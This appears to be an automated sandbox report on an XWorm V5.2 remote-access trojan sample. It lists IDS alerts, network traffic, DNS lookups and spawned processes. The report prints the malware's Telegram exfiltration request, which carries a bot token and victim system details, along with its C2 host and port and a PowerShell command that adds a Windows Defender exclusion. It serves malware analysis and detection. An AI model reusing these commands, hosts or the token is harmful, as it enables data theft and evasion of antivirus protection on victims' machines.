2024-12-06T22:46:18.858988+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.9	49853	147.185.221.22	12886	TCP
2024-12-06T22:46:19.602049+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	147.185.221.22	12886	192.168.2.9	49853	TCP
2024-12-06T22:46:19.602049+0100	2852874	ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2	1	147.185.221.22	12886	192.168.2.9	49853	TCP
2024-12-06T22:46:30.092229+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	147.185.221.22	12886	192.168.2.9	49853	TCP
2024-12-06T22:46:30.094220+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.9	49853	147.185.221.22	12886	TCP
2024-12-06T22:46:41.372777+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	147.185.221.22	12886	192.168.2.9	49853	TCP
2024-12-06T22:46:41.375960+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.9	49853	147.185.221.22	12886	TCP
2024-12-06T22:46:49.604166+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	147.185.221.22	12886	192.168.2.9	49853	TCP
2024-12-06T22:46:49.604166+0100	2852874	ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2	1	147.185.221.22	12886	192.168.2.9	49853	TCP
2024-12-06T22:46:51.511796+0100	2853685	ETPRO MALWARE Win32/XWorm Checkin via Telegram	1	192.168.2.9	49958	149.154.167.220	443	TCP
2024-12-06T22:46:52.653608+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	147.185.221.22	12886	192.168.2.9	49853	TCP
2024-12-06T22:46:52.655477+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.9	49853	147.185.221.22	12886	TCP
2024-12-06T22:47:01.107348+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	147.185.221.22	12886	192.168.2.9	49853	TCP
2024-12-06T22:47:01.117066+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.9	49853	147.185.221.22	12886	TCP
2024-12-06T22:47:02.686350+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	147.185.221.22	12886	192.168.2.9	49853	TCP
2024-12-06T22:47:13.200721+0100	2853193	ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound	1	192.168.2.9	49977	147.185.221.22	12886	TCP
2024-12-06T22:47:13.928949+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	147.185.221.22	12886	192.168.2.9	49977	TCP
2024-12-06T22:47:13.968839+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.9	49977	147.185.221.22	12886	TCP
2024-12-06T22:47:15.277941+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.9	49853	147.185.221.22	12886	TCP
2024-12-06T22:47:16.427395+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	147.185.221.22	12886	192.168.2.9	49853	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 6, 2024 22:45:01.722167015 CET	49717	80	192.168.2.9	208.95.112.1
Dec 6, 2024 22:45:01.726370096 CET	49718	80	192.168.2.9	208.95.112.1
Dec 6, 2024 22:45:01.841959000 CET	80	49717	208.95.112.1	192.168.2.9
Dec 6, 2024 22:45:01.842058897 CET	49717	80	192.168.2.9	208.95.112.1
Dec 6, 2024 22:45:01.846131086 CET	80	49718	208.95.112.1	192.168.2.9
Dec 6, 2024 22:45:01.846230984 CET	49718	80	192.168.2.9	208.95.112.1
Dec 6, 2024 22:45:01.881999969 CET	49717	80	192.168.2.9	208.95.112.1
Dec 6, 2024 22:45:01.883156061 CET	49718	80	192.168.2.9	208.95.112.1
Dec 6, 2024 22:45:02.001864910 CET	80	49717	208.95.112.1	192.168.2.9
Dec 6, 2024 22:45:02.002975941 CET	80	49718	208.95.112.1	192.168.2.9
Dec 6, 2024 22:45:02.967194080 CET	80	49718	208.95.112.1	192.168.2.9
Dec 6, 2024 22:45:03.009694099 CET	49718	80	192.168.2.9	208.95.112.1
Dec 6, 2024 22:45:03.016623020 CET	80	49717	208.95.112.1	192.168.2.9
Dec 6, 2024 22:45:03.071940899 CET	49717	80	192.168.2.9	208.95.112.1
Dec 6, 2024 22:45:51.024827003 CET	49825	443	192.168.2.9	149.154.167.220
Dec 6, 2024 22:45:51.024863958 CET	443	49825	149.154.167.220	192.168.2.9
Dec 6, 2024 22:45:51.025024891 CET	49825	443	192.168.2.9	149.154.167.220
Dec 6, 2024 22:45:51.044156075 CET	49825	443	192.168.2.9	149.154.167.220
Dec 6, 2024 22:45:51.044178963 CET	443	49825	149.154.167.220	192.168.2.9
Dec 6, 2024 22:45:52.441112995 CET	443	49825	149.154.167.220	192.168.2.9
Dec 6, 2024 22:45:52.441196918 CET	49825	443	192.168.2.9	149.154.167.220
Dec 6, 2024 22:45:52.442986965 CET	49825	443	192.168.2.9	149.154.167.220
Dec 6, 2024 22:45:52.442994118 CET	443	49825	149.154.167.220	192.168.2.9
Dec 6, 2024 22:45:52.443258047 CET	443	49825	149.154.167.220	192.168.2.9
Dec 6, 2024 22:45:52.487377882 CET	49825	443	192.168.2.9	149.154.167.220
Dec 6, 2024 22:45:52.535340071 CET	443	49825	149.154.167.220	192.168.2.9
Dec 6, 2024 22:45:53.124233961 CET	443	49825	149.154.167.220	192.168.2.9
Dec 6, 2024 22:45:53.124317884 CET	443	49825	149.154.167.220	192.168.2.9
Dec 6, 2024 22:45:53.125008106 CET	49825	443	192.168.2.9	149.154.167.220
Dec 6, 2024 22:45:53.130191088 CET	49825	443	192.168.2.9	149.154.167.220
Dec 6, 2024 22:46:03.388433933 CET	49853	12886	192.168.2.9	147.185.221.22
Dec 6, 2024 22:46:03.508286953 CET	12886	49853	147.185.221.22	192.168.2.9
Dec 6, 2024 22:46:03.508466959 CET	49853	12886	192.168.2.9	147.185.221.22
Dec 6, 2024 22:46:03.618989944 CET	49853	12886	192.168.2.9	147.185.221.22
Dec 6, 2024 22:46:03.738856077 CET	12886	49853	147.185.221.22	192.168.2.9
Dec 6, 2024 22:46:07.144324064 CET	80	49718	208.95.112.1	192.168.2.9
Dec 6, 2024 22:46:07.144498110 CET	49718	80	192.168.2.9	208.95.112.1
Dec 6, 2024 22:46:11.619716883 CET	80	49717	208.95.112.1	192.168.2.9
Dec 6, 2024 22:46:11.619786978 CET	49717	80	192.168.2.9	208.95.112.1
Dec 6, 2024 22:46:18.119385004 CET	49853	12886	192.168.2.9	147.185.221.22
Dec 6, 2024 22:46:18.240633965 CET	12886	49853	147.185.221.22	192.168.2.9
Dec 6, 2024 22:46:18.826308012 CET	12886	49853	147.185.221.22	192.168.2.9
Dec 6, 2024 22:46:18.858988047 CET	49853	12886	192.168.2.9	147.185.221.22
Dec 6, 2024 22:46:18.979015112 CET	12886	49853	147.185.221.22	192.168.2.9
Dec 6, 2024 22:46:19.602049112 CET	12886	49853	147.185.221.22	192.168.2.9
Dec 6, 2024 22:46:19.650417089 CET	49853	12886	192.168.2.9	147.185.221.22
Dec 6, 2024 22:46:29.385777950 CET	49853	12886	192.168.2.9	147.185.221.22
Dec 6, 2024 22:46:29.506232977 CET	12886	49853	147.185.221.22	192.168.2.9
Dec 6, 2024 22:46:30.092228889 CET	12886	49853	147.185.221.22	192.168.2.9
Dec 6, 2024 22:46:30.094219923 CET	49853	12886	192.168.2.9	147.185.221.22
Dec 6, 2024 22:46:30.214184046 CET	12886	49853	147.185.221.22	192.168.2.9
Dec 6, 2024 22:46:40.666428089 CET	49853	12886	192.168.2.9	147.185.221.22
Dec 6, 2024 22:46:40.786209106 CET	12886	49853	147.185.221.22	192.168.2.9
Dec 6, 2024 22:46:41.372776985 CET	12886	49853	147.185.221.22	192.168.2.9
Dec 6, 2024 22:46:41.375960112 CET	49853	12886	192.168.2.9	147.185.221.22
Dec 6, 2024 22:46:41.495676041 CET	12886	49853	147.185.221.22	192.168.2.9
Dec 6, 2024 22:46:42.979626894 CET	49718	80	192.168.2.9	208.95.112.1
Dec 6, 2024 22:46:43.026416063 CET	49717	80	192.168.2.9	208.95.112.1
Dec 6, 2024 22:46:43.099318981 CET	80	49718	208.95.112.1	192.168.2.9
Dec 6, 2024 22:46:43.146116018 CET	80	49717	208.95.112.1	192.168.2.9
Dec 6, 2024 22:46:49.443300962 CET	49958	443	192.168.2.9	149.154.167.220
Dec 6, 2024 22:46:49.443366051 CET	443	49958	149.154.167.220	192.168.2.9
Dec 6, 2024 22:46:49.443489075 CET	49958	443	192.168.2.9	149.154.167.220
Dec 6, 2024 22:46:49.449378967 CET	49958	443	192.168.2.9	149.154.167.220
Dec 6, 2024 22:46:49.449404001 CET	443	49958	149.154.167.220	192.168.2.9
Dec 6, 2024 22:46:49.604166031 CET	12886	49853	147.185.221.22	192.168.2.9
Dec 6, 2024 22:46:49.650557041 CET	49853	12886	192.168.2.9	147.185.221.22
Dec 6, 2024 22:46:50.810718060 CET	443	49958	149.154.167.220	192.168.2.9
Dec 6, 2024 22:46:50.810808897 CET	49958	443	192.168.2.9	149.154.167.220
Dec 6, 2024 22:46:50.813003063 CET	49958	443	192.168.2.9	149.154.167.220
Dec 6, 2024 22:46:50.813009977 CET	443	49958	149.154.167.220	192.168.2.9
Dec 6, 2024 22:46:50.813267946 CET	443	49958	149.154.167.220	192.168.2.9
Dec 6, 2024 22:46:50.853677988 CET	49958	443	192.168.2.9	149.154.167.220
Dec 6, 2024 22:46:50.861675978 CET	49958	443	192.168.2.9	149.154.167.220
Dec 6, 2024 22:46:50.907340050 CET	443	49958	149.154.167.220	192.168.2.9
Dec 6, 2024 22:46:51.511787891 CET	443	49958	149.154.167.220	192.168.2.9
Dec 6, 2024 22:46:51.511853933 CET	443	49958	149.154.167.220	192.168.2.9
Dec 6, 2024 22:46:51.511991978 CET	49958	443	192.168.2.9	149.154.167.220
Dec 6, 2024 22:46:51.514925003 CET	49958	443	192.168.2.9	149.154.167.220
Dec 6, 2024 22:46:51.948564053 CET	49853	12886	192.168.2.9	147.185.221.22
Dec 6, 2024 22:46:52.068526030 CET	12886	49853	147.185.221.22	192.168.2.9
Dec 6, 2024 22:46:52.653608084 CET	12886	49853	147.185.221.22	192.168.2.9
Dec 6, 2024 22:46:52.655477047 CET	49853	12886	192.168.2.9	147.185.221.22
Dec 6, 2024 22:46:52.776290894 CET	12886	49853	147.185.221.22	192.168.2.9
Dec 6, 2024 22:46:57.882378101 CET	49977	12886	192.168.2.9	147.185.221.22
Dec 6, 2024 22:46:58.002496004 CET	12886	49977	147.185.221.22	192.168.2.9
Dec 6, 2024 22:46:58.006238937 CET	49977	12886	192.168.2.9	147.185.221.22
Dec 6, 2024 22:46:58.034151077 CET	49977	12886	192.168.2.9	147.185.221.22
Dec 6, 2024 22:46:58.154015064 CET	12886	49977	147.185.221.22	192.168.2.9
Dec 6, 2024 22:47:00.402187109 CET	49853	12886	192.168.2.9	147.185.221.22
Dec 6, 2024 22:47:00.521851063 CET	12886	49853	147.185.221.22	192.168.2.9
Dec 6, 2024 22:47:01.107347965 CET	12886	49853	147.185.221.22	192.168.2.9
Dec 6, 2024 22:47:01.117065907 CET	49853	12886	192.168.2.9	147.185.221.22
Dec 6, 2024 22:47:01.236979008 CET	12886	49853	147.185.221.22	192.168.2.9
Dec 6, 2024 22:47:01.981009007 CET	49853	12886	192.168.2.9	147.185.221.22
Dec 6, 2024 22:47:02.100941896 CET	12886	49853	147.185.221.22	192.168.2.9
Dec 6, 2024 22:47:02.686350107 CET	12886	49853	147.185.221.22	192.168.2.9
Dec 6, 2024 22:47:02.838205099 CET	49853	12886	192.168.2.9	147.185.221.22
Dec 6, 2024 22:47:13.200721025 CET	49977	12886	192.168.2.9	147.185.221.22
Dec 6, 2024 22:47:13.320517063 CET	12886	49977	147.185.221.22	192.168.2.9
Dec 6, 2024 22:47:13.928949118 CET	12886	49977	147.185.221.22	192.168.2.9
Dec 6, 2024 22:47:13.968838930 CET	49977	12886	192.168.2.9	147.185.221.22
Dec 6, 2024 22:47:14.088802099 CET	12886	49977	147.185.221.22	192.168.2.9
Dec 6, 2024 22:47:15.277940989 CET	49853	12886	192.168.2.9	147.185.221.22
Dec 6, 2024 22:47:15.397816896 CET	12886	49853	147.185.221.22	192.168.2.9
Dec 6, 2024 22:47:15.397865057 CET	49853	12886	192.168.2.9	147.185.221.22
Dec 6, 2024 22:47:15.519037008 CET	12886	49853	147.185.221.22	192.168.2.9
Dec 6, 2024 22:47:16.427395105 CET	12886	49853	147.185.221.22	192.168.2.9
Dec 6, 2024 22:47:16.553340912 CET	49853	12886	192.168.2.9	147.185.221.22

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 6, 2024 22:45:01.565632105 CET	55945	53	192.168.2.9	1.1.1.1
Dec 6, 2024 22:45:01.707586050 CET	53	55945	1.1.1.1	192.168.2.9
Dec 6, 2024 22:45:50.886702061 CET	54912	53	192.168.2.9	1.1.1.1
Dec 6, 2024 22:45:51.024120092 CET	53	54912	1.1.1.1	192.168.2.9
Dec 6, 2024 22:46:57.324816942 CET	53621	53	192.168.2.9	1.1.1.1
Dec 6, 2024 22:46:57.880480051 CET	53	53621	1.1.1.1	192.168.2.9

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 6, 2024 22:45:01.565632105 CET	192.168.2.9	1.1.1.1	0x36c6	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false
Dec 6, 2024 22:45:50.886702061 CET	192.168.2.9	1.1.1.1	0xc3a	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Dec 6, 2024 22:46:57.324816942 CET	192.168.2.9	1.1.1.1	0xafb4	Standard query (0)	carolina-comes.gl.at.ply.gg	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 6, 2024 22:44:56.014552116 CET	1.1.1.1	192.168.2.9	0x1d89	No error (0)	shed.dual-low.s-part-0035.t-0009.t-msedge.net	s-part-0035.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 6, 2024 22:44:56.014552116 CET	1.1.1.1	192.168.2.9	0x1d89	No error (0)	s-part-0035.t-0009.t-msedge.net		13.107.246.63	A (IP address)	IN (0x0001)	false
Dec 6, 2024 22:45:01.707586050 CET	1.1.1.1	192.168.2.9	0x36c6	No error (0)	ip-api.com		208.95.112.1	A (IP address)	IN (0x0001)	false
Dec 6, 2024 22:45:51.024120092 CET	1.1.1.1	192.168.2.9	0xc3a	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false
Dec 6, 2024 22:46:57.880480051 CET	1.1.1.1	192.168.2.9	0xafb4	No error (0)	carolina-comes.gl.at.ply.gg		147.185.221.22	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.telegram.org

ip-api.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.9	49717	208.95.112.1	80	7756	C:\Users\user\wasdwasfwasfs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:45:01.881999969 CET	80	OUT	GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Dec 6, 2024 22:45:03.016623020 CET	175	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:45:02 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 6 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 66 61 6c 73 65 0a Data Ascii: false

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.9	49718	208.95.112.1	80	7732	C:\Users\user\adawsfaefasfasfg.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:45:01.883156061 CET	80	OUT	GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Dec 6, 2024 22:45:02.967194080 CET	175	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:45:02 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 6 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 66 61 6c 73 65 0a Data Ascii: false

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.9	49825	149.154.167.220	443	7756	C:\Users\user\wasdwasfwasfs.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-06 21:45:52 UTC	444	OUT	GET /bot7517837255:AAFFYwsM3RAJTfnCWwagMLHeBQRG-F4UScg/sendMessage?chat_id=7538845070&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AE3C0EEEB514F72781BA2%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20ELOET%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.2 HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-12-06 21:45:53 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 06 Dec 2024 21:45:52 GMT Content-Type: application/json Content-Length: 461 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-06 21:45:53 UTC	461	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 35 38 32 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 35 31 37 38 33 37 32 35 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 69 6e 64 69 61 6e 77 6f 72 6b 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 69 6e 64 69 61 6e 77 6f 72 6b 65 72 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 35 33 38 38 34 35 30 37 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4a 4f 48 4e 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 54 61 74 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4a 6f 68 6e 6e 79 74 61 74 65 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 33 35 32 31 Data Ascii: {"ok":true,"result":{"message_id":5828,"from":{"id":7517837255,"is_bot":true,"first_name":"indianworke","username":"indianworker_bot"},"chat":{"id":7538845070,"first_name":"JOHN","last_name":"Tate","username":"Johnnytate1","type":"private"},"date":1733521

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.9	49958	149.154.167.220	443	7732	C:\Users\user\adawsfaefasfasfg.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-06 21:46:50 UTC	444	OUT	GET /bot7517837255:AAFFYwsM3RAJTfnCWwagMLHeBQRG-F4UScg/sendMessage?chat_id=7538845070&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AE3C0EEEB514F72781BA2%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20ELOET%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.2 HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-12-06 21:46:51 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 06 Dec 2024 21:46:51 GMT Content-Type: application/json Content-Length: 461 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-06 21:46:51 UTC	461	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 35 38 33 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 35 31 37 38 33 37 32 35 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 69 6e 64 69 61 6e 77 6f 72 6b 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 69 6e 64 69 61 6e 77 6f 72 6b 65 72 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 35 33 38 38 34 35 30 37 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4a 4f 48 4e 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 54 61 74 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4a 6f 68 6e 6e 79 74 61 74 65 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 33 35 32 31 Data Ascii: {"ok":true,"result":{"message_id":5834,"from":{"id":7517837255,"is_bot":true,"first_name":"indianworke","username":"indianworker_bot"},"chat":{"id":7538845070,"first_name":"JOHN","last_name":"Tate","username":"Johnnytate1","type":"private"},"date":1733521

Target ID:	0
Start time:	16:44:55
Start date:	06/12/2024
Path:	C:\Users\user\Desktop\ozgpPwVAu1.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\ozgpPwVAu1.exe"
Imagebase:	0xa90000
File size:	193'024 bytes
MD5 hash:	784BD7F714CF13880F47C591E7AED7FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.1326803778.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1326803778.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.1326803778.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	16:44:56
Start date:	06/12/2024
Path:	C:\Users\user\adawsfaefasfasfg.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\adawsfaefasfasfg.exe"
Imagebase:	0xeb0000
File size:	43'520 bytes
MD5 hash:	190010C187189B92E49A0ED05F6DDC88
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000002.00000000.1322668659.0000000000EB2000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000000.1322668659.0000000000EB2000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000002.00000000.1322668659.0000000000EB2000.00000002.00000001.01000000.00000006.sdmp, Author: ditekSHen Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000002.00000002.2592447973.0000000003081000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\adawsfaefasfasfg.exe, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\adawsfaefasfasfg.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\adawsfaefasfasfg.exe, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\adawsfaefasfasfg.exe, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\adawsfaefasfasfg.exe, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	16:44:56
Start date:	06/12/2024
Path:	C:\Users\user\wasdwasfwasfs.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\wasdwasfwasfs.exe"
Imagebase:	0xc80000
File size:	41'472 bytes
MD5 hash:	34452F83F7D58EC91D2CEDF4B24C9764
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000002.2591449977.0000000002F05000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000002.2591449977.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000000.1323412676.0000000000C82000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000000.1323412676.0000000000C82000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000003.00000000.1323412676.0000000000C82000.00000002.00000001.01000000.00000007.sdmp, Author: ditekSHen Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\wasdwasfwasfs.exe, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\wasdwasfwasfs.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\wasdwasfwasfs.exe, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\wasdwasfwasfs.exe, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\wasdwasfwasfs.exe, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	16:44:56
Start date:	06/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\PIN CRACKER V2.bat" "
Imagebase:	0x7ff779360000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	16:44:56
Start date:	06/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	16:44:57
Start date:	06/12/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff74d9b0000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	16:44:57
Start date:	06/12/2024
Path:	C:\Windows\System32\where.exe
Wow64 process (32bit):	false
Commandline:	where curl
Imagebase:	0x7ff687740000
File size:	43'008 bytes
MD5 hash:	3CF958B0F63FB1D74F7FCFE14B039A58
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	16:45:01
Start date:	06/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\adawsfaefasfasfg.exe'
Imagebase:	0x7ff760310000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	16:45:01
